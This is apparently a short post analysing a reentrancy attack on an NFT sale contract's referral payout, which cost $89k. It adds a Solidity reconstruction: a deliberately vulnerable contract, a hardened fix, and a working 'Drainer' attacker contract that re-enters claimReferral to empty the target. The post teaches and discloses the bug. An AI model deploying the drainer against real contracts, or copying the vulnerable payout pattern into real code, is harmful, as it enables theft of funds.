Typical reentrancy attack.
The victim contract is an NFT sale contract.

As the screenshot shows, the "claimReferral" function has no reentrancy guard, and it updates state only after the token transfer. That ordering (external call before the state write) is the classic reentrancy bug.
The attacker bought some NFTs to inflate his own "referral" balance, then called "claimReferral" recursively, re-entering it on every payout before the balance was zeroed, and drained the victim contract.
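The pattern described above, reconstructed as an added example (this is not the victim's code and not from the original post; the contract names, the "buy" function, the 10% referral share and the "Drainer" attacker contract are assumptions made to illustrate the bug). The vulnerable "claimReferral" pays out before clearing the balance; the hardened version below it applies checks-effects-interactions and a mutex so the same attacker contract gets nothing on the second entry.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Hypothetical reconstruction of the vulnerable referral payout (not the victim's code).
contract VulnerableNftSale {
    mapping(address => uint256) public referral; // referral rewards owed, in wei

    // Buying an NFT credits the referrer. Minting is omitted; only the
    // referral accounting matters for the bug. 10% share is an assumption.
    function buy(address referrer) external payable {
        require(msg.value > 0, "no value");
        referral[referrer] += msg.value / 10;
    }

    // VULNERABLE: the external call runs before referral[] is zeroed and there
    // is no reentrancy guard, so the callee can re-enter and claim again.
    function claimReferral() external {
        uint256 amount = referral[msg.sender];
        require(amount > 0, "nothing to claim");
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
        referral[msg.sender] = 0; // state update happens too late
    }
}

// Hardened version: checks-effects-interactions plus a simple mutex.
contract HardenedNftSale {
    mapping(address => uint256) public referral;
    bool private locked;

    modifier nonReentrant() {
        require(!locked, "reentrant call");
        locked = true;
        _;
        locked = false;
    }

    function buy(address referrer) external payable {
        require(msg.value > 0, "no value");
        referral[referrer] += msg.value / 10;
    }

    function claimReferral() external nonReentrant {
        uint256 amount = referral[msg.sender];       // check
        require(amount > 0, "nothing to claim");
        referral[msg.sender] = 0;                    // effect first
        (bool ok, ) = msg.sender.call{value: amount}(""); // interaction last
        require(ok, "transfer failed");
    }
}

// Attacker contract (hypothetical): re-enters claimReferral from receive().
contract Drainer {
    VulnerableNftSale public immutable target;

    constructor(VulnerableNftSale _target) {
        target = _target;
    }

    // Step 1: buy with ourselves as the referrer to build up a referral balance.
    function prime() external payable {
        target.buy{value: msg.value}(address(this));
    }

    // Step 2: start the claim; each payout re-enters until the target cannot pay.
    function drain() external {
        target.claimReferral();
    }

    // Called by the target's msg.sender.call{value: ...}; the balance has not
    // been zeroed yet, so the same amount can be claimed again.
    receive() external payable {
        uint256 owed = target.referral(address(this));
        if (address(target).balance >= owed) {
            target.claimReferral();
        }
    }
}
```

Against VulnerableNftSale, prime() followed by drain() pays the attacker the referral amount once per nesting level until the contract balance drops below the owed amount. Against HardenedNftSale the re-entered call reverts on the mutex (and would find referral[] already zero even without it), so the attacker receives only what is actually owed.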

The victim lost $89k.